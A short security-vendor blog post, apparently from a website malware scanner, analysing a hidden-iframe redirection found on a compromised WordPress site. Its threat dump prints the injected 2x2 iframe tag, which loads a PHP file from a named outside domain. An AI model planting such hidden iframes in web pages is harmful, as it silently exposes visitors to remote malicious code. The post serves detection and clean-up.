Hidden iframe with malicious redirection
This sort of malicious re-directions using hidden iframes is a common threat that is detected by Quttera's Website walware scanner. It is actually very easy to detect for website owners who's website has been compromised.
Submission Date: Sun Mar 24 15:11:13 2013
Threat Dump:
[[<iframe src="http://msrepresentaciones.com.ar/wp-content/uploads/2011/10/update.php" width="2" height="2" frameborder="0">]]
Threat Dump:
[[<iframe src="http://msrepresentaciones.com.ar/wp-content/uploads/2011/10/update.php" width="2" height="2" frameborder="0">]]
The path /wp-content/uploads/2011/10/ of WordPress based website contains update.php file which will be downloaded by the iframe and executed. Usually, this is done to hide the fact of file loading and to perform malicious activity in the background.
Now, further we can see that per Google SafeBrowsing the domain that hosts this .php file is Blacklisted.
Of course, website malware monitoring do this automatically so that the file clean-up is actually much easier.
No comments:
Post a Comment